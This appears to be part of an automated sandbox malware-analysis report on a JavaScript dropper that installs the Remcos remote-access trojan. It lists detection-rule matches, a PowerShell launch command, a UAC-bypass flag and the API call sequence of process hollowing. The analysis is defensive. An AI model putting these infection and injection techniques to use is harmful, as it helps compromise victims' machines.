Source: Yara match	File source: 00000009.00000002.1402730811.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1402730811.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7564, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2518531242.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1402730811.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2518531242.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1402730811.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7564, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_0041CF2D SystemParametersInfoW,

11_2_0041CF2D

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000009.00000002.1402730811.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000009.00000002.1402730811.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7336, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7460, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7564, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

PE file contains section with special chars

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.7.dr

Static PE information: section name: iVN#X-

PE file has nameless sections

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.7.dr

Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}			Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00418267 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,GetLastError,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,	11_2_00418267
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0041C077 OpenProcess,NtSuspendProcess,CloseHandle,	11_2_0041C077
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0041C0A3 OpenProcess,NtResumeProcess,CloseHandle,	11_2_0041C0A3
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_10006EF0 OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,	11_2_10006EF0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	13_2_0040BAE3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_004016FD NtdllDefWindowProc_A,	14_2_004016FD
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_004017B7 NtdllDefWindowProc_A,	14_2_004017B7
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00402CAC NtdllDefWindowProc_A,	15_2_00402CAC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00402D66 NtdllDefWindowProc_A,	15_2_00402D66

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_00416861 ExitWindowsEx,LoadLibraryA,GetProcAddress,

11_2_00416861

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 9_2_008A28D0	9_2_008A28D0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 9_2_008A0848	9_2_008A0848
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 9_2_008A11E0	9_2_008A11E0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 9_2_008A9911	9_2_008A9911
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 9_2_008A28C0	9_2_008A28C0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 9_2_008A0838	9_2_008A0838
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0042809D	11_2_0042809D
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0045412B	11_2_0045412B
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_004421C0	11_2_004421C0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_004281D7	11_2_004281D7
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0043E1E0	11_2_0043E1E0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0041E29B	11_2_0041E29B
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_004373DA	11_2_004373DA
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00438380	11_2_00438380
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00453472	11_2_00453472
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0042747E	11_2_0042747E
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0043E43D	11_2_0043E43D
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_004325A1	11_2_004325A1
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0043774C	11_2_0043774C
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0041F809	11_2_0041F809
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_004379F6	11_2_004379F6
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_004279F5	11_2_004279F5
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0044DAD9	11_2_0044DAD9
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00433C73	11_2_00433C73
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00413CA0	11_2_00413CA0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00437CBD	11_2_00437CBD
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0043DD82	11_2_0043DD82
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00435F52	11_2_00435F52
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00437F78	11_2_00437F78
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0043DFB1	11_2_0043DFB1
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_040BB5C1	11_2_040BB5C1
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_040C7194	11_2_040C7194
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_100012CB	11_2_100012CB
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_1000F1CE	11_2_1000F1CE
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_10032287	11_2_10032287
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_1000F3FD	11_2_1000F3FD
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_1000B950	11_2_1000B950
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_10009AD0	11_2_10009AD0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_1001FAEB	11_2_1001FAEB
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_10013BD0	11_2_10013BD0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_10009D40	11_2_10009D40
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_1001BF19	11_2_1001BF19
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044A030	13_2_0044A030
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0040612B	13_2_0040612B
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0043E13D	13_2_0043E13D
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044B188	13_2_0044B188
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00442273	13_2_00442273
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044D380	13_2_0044D380
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044A5F0	13_2_0044A5F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_004125F6	13_2_004125F6
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_004065BF	13_2_004065BF
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_004086CB	13_2_004086CB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_004066BC	13_2_004066BC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044D760	13_2_0044D760
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00405A40	13_2_00405A40
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00449A40	13_2_00449A40
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00405AB1	13_2_00405AB1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00405B22	13_2_00405B22
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044ABC0	13_2_0044ABC0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00405BB3	13_2_00405BB3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00417C60	13_2_00417C60
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044CC70	13_2_0044CC70
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00418CC9	13_2_00418CC9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044CDFB	13_2_0044CDFB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044CDA0	13_2_0044CDA0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044AE20	13_2_0044AE20
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00415E3E	13_2_00415E3E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00437F3B	13_2_00437F3B
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00405038	14_2_00405038
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0041208C	14_2_0041208C
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_004050A9	14_2_004050A9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0040511A	14_2_0040511A
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0043C13A	14_2_0043C13A
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_004051AB	14_2_004051AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00449300	14_2_00449300
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0040D322	14_2_0040D322
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0044A4F0	14_2_0044A4F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0043A5AB	14_2_0043A5AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00413631	14_2_00413631
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00446690	14_2_00446690
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0044A730	14_2_0044A730
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_004398D8	14_2_004398D8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_004498E0	14_2_004498E0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0044A886	14_2_0044A886
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0043DA09	14_2_0043DA09
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00438D5E	14_2_00438D5E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00449ED0	14_2_00449ED0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0041FE83	14_2_0041FE83
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00430F54	14_2_00430F54
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_004050C2	15_2_004050C2
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_004014AB	15_2_004014AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00405133	15_2_00405133
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_004051A4	15_2_004051A4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00401246	15_2_00401246
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_0040CA46	15_2_0040CA46
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00405235	15_2_00405235
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_004032C8	15_2_004032C8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00401689	15_2_00401689
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00402F60	15_2_00402F60

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe A99CCEB10B25249454273EE74F83E3AE96AACCAA904BF8707E2C212857CADADC

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 004351E0 appears 55 times
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 00434ACF appears 43 times
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 00401F96 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 1000A588 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 00401EBF appears 36 times
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 1000B0E0 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 00402117 appears 40 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 0044DDB0 appears 33 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00418555 appears 34 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 004186B6 appears 58 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 004188FE appears 88 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00413025 appears 79 times

Source: Pagamento Processado.js

Initial sample: Strings found which are bigger than 50

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000009.00000002.1402730811.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
